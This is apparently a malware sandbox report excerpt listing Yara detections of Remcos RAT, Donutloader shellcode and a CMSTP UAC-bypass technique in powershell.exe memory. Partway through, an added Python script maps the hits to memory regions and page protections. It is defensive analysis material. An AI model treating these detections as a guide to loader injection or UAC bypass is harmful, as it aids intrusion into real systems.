                Source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5472, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 5472, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 1808, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
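The Yara rows above carry more than the rule name: each `.sdmp` identifier encodes which process and which memory region the hit came from, so the same list can be turned into a per-process, per-region view. The script below is an added example written for this page, not Joe Sandbox code; the sample rows are constructed in the shape of the report lines, the "|" column separator is optional (the regexes match the run-together form too), and the field layout is an assumption: the first two fields are the process index and dump round (the page's own "10.2.powershell.exe" naming confirms 0000000A.00000002 = process 10, dump 2), the fourth is the region base address, and the fifth is taken to be the Win32 page protection (the 0x02/0x04/0x40 values seen here are PAGE_READONLY/PAGE_READWRITE/PAGE_EXECUTE_READWRITE). The remaining fields are left opaque.

```python
"""Map Joe Sandbox Yara hits back to process index, region and page protection."""
import re
from collections import defaultdict

# Win32 page-protection constants from winnt.h. ASSUMPTION: the fifth dotted
# field of a Joe Sandbox .sdmp name carries this value.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_MASK = 0xF0  # any PAGE_EXECUTE* bit

# Eight dotted hex/decimal fields followed by "sdmp".
DUMP_RE = re.compile(r"\b(?:[0-9A-Fa-f]{8,16}\.){8}sdmp\b")
RULE_RE = re.compile(r"Matched rule: (\S+)")

# Constructed sample rows in the shape of this report's evidence lines.
SAMPLE_LINES = """\
Source: 0000003C.00000002.3037711043.0000000005E4B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000A.00000002.1663209869.0000000008A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001B.00000002.1930013571.0000000006091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000001B.00000002.1932265209.0000000006131000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: Yara match | File source: 0000001B.00000002.1961674745.000000000780D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
"""


def parse_dump_name(name):
    """Split an .sdmp identifier into process index, dump round, base and protection."""
    fields = name.split(".")
    if len(fields) != 9 or fields[-1] != "sdmp":
        raise ValueError(f"unexpected dump name: {name}")
    prot = int(fields[4], 16)
    return {
        "process": int(fields[0], 16),   # 0000000A -> 10, matches "10.2.powershell.exe"
        "dump": int(fields[1], 16),      # 00000002 -> dump round 2
        "base": int(fields[3], 16),      # region base address
        "protection": prot,
        "protection_name": PAGE_PROTECTION.get(prot & 0xFF, f"0x{prot:X}"),
        "executable": bool(prot & EXECUTABLE_MASK),
        "raw": name,
    }


def parse_yara_lines(text):
    """Collect one record per region-backed Yara row; MEMORYSTR/UNPACKEDPE rows carry no region."""
    records = []
    for line in text.splitlines():
        dump = DUMP_RE.search(line)
        if not dump:
            continue
        rec = parse_dump_name(dump.group(0))
        rule = RULE_RE.search(line)
        rec["rule"] = rule.group(1) if rule else None
        records.append(rec)
    return records


def executable_regions(records):
    """Hits inside regions with an execute bit: the loader/shellcode candidates."""
    return [r for r in records if r["executable"]]


def rules_by_process(records):
    """Process index -> set of rule names that fired in that process."""
    out = defaultdict(set)
    for r in records:
        if r["rule"]:
            out[r["process"]].add(r["rule"])
    return dict(out)


def report(records):
    lines = []
    for r in sorted(records, key=lambda r: (r["process"], r["base"])):
        flag = "EXEC" if r["executable"] else "    "
        lines.append(f"proc {r['process']:>3} dump {r['dump']} base 0x{r['base']:016X} "
                     f"{r['protection_name']:<24} {flag} {r['rule'] or '-'}")
    return "\n".join(lines)


if __name__ == "__main__":
    recs = parse_yara_lines(SAMPLE_LINES)
    print(report(recs))
    for proc, rules in sorted(rules_by_process(recs).items()):
        print(f"process index {proc}: {', '.join(sorted(rules))}")
```

Run over the rows of this section, and under the protection-field assumption above, every Donutloader hit that sits in a 0x40 region is a PAGE_EXECUTE_READWRITE private region inside powershell.exe, which is what a reflectively loaded shellcode stub looks like, while the Remcos hits sit in 0x02/0x04 (read-only or read-write) regions. Pivoting on "Yara hit plus executable private region" in a given process index is a quick way to pick the injection site out of a long match list.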
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00401806 NtdllDefWindowProc_W
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_004018C0 NtdllDefWindowProc_W
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_004016FD NtdllDefWindowProc_A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_004017B7 NtdllDefWindowProc_A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0044B040
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0043610D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00447310
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0044A490
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0040755A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0043C560
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0044B610
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0044D6C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_004476F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0044B870
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0044081D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00414957
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_004079EE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00407AEB
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0044AA80
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00412AA9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00404B74
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00404B03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0044BBD8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00404BE5
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00404C76
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00415CFE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00416D72
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00446D30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00446D8B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00406E8F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00405038
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_0041208C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_004050A9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_0040511A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_0043C13A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_004051AB
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00449300
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_0040D322
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_0044A4F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_0043A5AB
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00413631
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00446690
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_0044A730
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_004398D8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_004498E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_0044A886
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_0043DA09
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00438D5E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00449ED0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_0041FE83
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00430F54
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: String function: 00422297 appears 42 times
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: String function: 004169A7 appears 87 times
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: String function: 00444B5A appears 37 times
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: String function: 0044DB70 appears 41 times
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: String function: 004165FF appears 35 times
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: String function: 00413025 appears 79 times
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: String function: 00416760 appears 69 times
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0000003C.00000002.3037711043.0000000005E4B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000046.00000002.4179942082.000000000AFF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000046.00000002.3558882823.0000000005A1C000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000000A.00000002.1664350212.000000000984B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000001B.00000002.1930013571.0000000006091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000001B.00000002.1932265209.0000000006131000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000027.00000002.2318491679.000000000916C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000A.00000002.1666563849.000000000A3D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000A.00000002.1663209869.0000000008A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000016.00000002.1821567285.00000000085CC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000031.00000002.2611623646.0000000005C4B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000002C.00000002.2531189391.0000000008E9C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000001B.00000002.1976587463.000000000A541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000050.00000002.4176174475.00000000055DE000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000046.00000002.3519219272.000000000597C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000027.00000002.2239205630.000000000632B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000000A.00000002.1672116393.000000000A836000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000022.00000002.2082788404.00000000064CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000004B.00000002.3963998380.0000000005A85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000027.00000002.2235153189.000000000628A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000004B.00000002.4003774711.0000000005AED000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000041.00000002.3324693683.00000000060BB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000001B.00000002.1976169580.00000000095AC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000016.00000002.1789068655.00000000054C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000050.00000002.4142249719.000000000553E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000041.00000002.3951857716.00000000095DC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000037.00000002.2811950232.0000000005BFC000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
